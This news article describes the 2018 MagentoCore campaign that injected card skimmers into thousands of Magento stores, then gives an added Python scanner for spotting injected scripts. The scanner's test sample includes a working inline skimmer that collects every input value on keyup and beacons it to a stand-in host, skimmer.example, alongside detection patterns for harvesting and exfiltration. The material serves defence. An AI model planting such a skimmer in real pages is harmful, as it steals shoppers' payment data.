4.2 percent of all Magento Stores Globally Leaking Payment and Customer Data

By Natasha Sholl | 04 Sep 2018

Thousands of Magento sites are reportedly infected with malware, stealing customer data and turning them into ‘zombie money machines.’

Security researcher Willem de Groot scanned websites running Magento shopping cart software and shockingly found that thousands run a skimmer script that captures form input data. “Online skimming…has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer,” he wrote. “In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

Scans also revealed over 100 infected .com.au sites. The true number of Australian sites affected could be considerably higher, since many Australian stores do not use .au domain names.

A malware scan of about 220,000 sites globally showed that 4.2 percent were leaking payment and customer data. Site operators that aren’t patching their Magento installations, or that leave the admin panel exposed to password guessing, are leaving them open to malicious script injection. “The MagentoCore skimmers gain illicit access to the control panel of an e-commerce site, often with brute force techniques (automatically trying lots of passwords, sometimes for months). Once they succeed, an embedded piece of Javascript is added to the HTML template,” De Groot explained. “This script records keystrokes from unsuspecting customers and sends everything in real-time to the ‘magentocore.net’ server, registered in Moscow.”
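The injection De Groot describes leaves two traces in the rendered storefront: a script tag loading from a host the merchant never added, or an inline script that both reads form fields and ships them off-site. The following is an added example of a page check built on that idea; it is not code from the article or from De Groot's scanner. The sample pages, the allowlisted hosts, and the skimmer.example domain in the infected sample are constructed for the demo, and the inline-script heuristic is a pairing of harvest and exfiltration patterns that a real skimmer can evade with obfuscation, so treat a clean result as a starting point, not a guarantee.

```python
"""Scan rendered storefront HTML for scripts that could be form skimmers.

Added example, not code from the article or from Willem de Groot's scanner.
Flags (1) external <script src> hosts outside the store's allowlist and
(2) inline scripts that both read form input and send data to the network.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the merchant knows it loads scripts from (constructed for this demo).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

# Inline-script features a skimmer typically combines: harvesting input
# values, and shipping them off-site. A script needs one from each list.
HARVEST_PATTERNS = [r"keyup", r"keydown", r"keypress", r"\.value\b",
                    r"FormData", r"querySelectorAll\(['\"]input"]
EXFIL_PATTERNS = [r"XMLHttpRequest", r"\bfetch\(", r"navigator\.sendBeacon",
                  r"new\s+Image\(", r"\.src\s*=\s*['\"]https?://"]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _matches(patterns, text):
    return [p for p in patterns if re.search(p, text)]


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for one HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        # Protocol-relative "//host/x.js" parses like a full URL; a relative
        # path has no host and is served by the store itself.
        host = urlparse(src if "//" in src else "//" + src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in parser.inline:
        harvest = _matches(HARVEST_PATTERNS, body)
        exfil = _matches(EXFIL_PATTERNS, body)
        if harvest and exfil:
            findings.append(("inline-skimmer-pattern", f"{harvest[0]} + {exfil[0]}"))
    return findings


# Constructed sample: a clean checkout page.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example/js/checkout.js"></script>
<script>window.checkoutConfig = {currency: "AUD"};</script>
</head><body><form id="co"><input name="cc_number"></form></body></html>"""

# Constructed sample: the same page with an injected off-site script tag and
# an inline skimmer-style script (skimmer.example is a reserved example name).
INFECTED_PAGE = """<html><head>
<script src="https://cdn.example/js/checkout.js"></script>
<script src="//skimmer.example/mage.js"></script>
<script>
document.addEventListener("keyup", function () {
  var d = {};
  document.querySelectorAll("input").forEach(function (i) { d[i.name] = i.value; });
  new Image().src = "https://skimmer.example/c?" + encodeURIComponent(JSON.stringify(d));
});
</script>
</head><body><form id="co"><input name="cc_number"></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, find_suspicious_scripts(page))
```

Run it against the HTML your own fetch of the checkout page returns rather than the template on disk: a skimmer injected via the database-stored design configuration shows up in the rendered page even when the theme files look untouched.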

Brands are reportedly hijacked at a pace of 50 to 60 per day, with those hacked including multi-million dollar, publicly traded companies.

De Groot suggested that merchants work out how the attackers got in by analysing their backend logs, and then close every means of unauthorised access at the same time, so that a cleaned site is not simply re-infected through a second door.
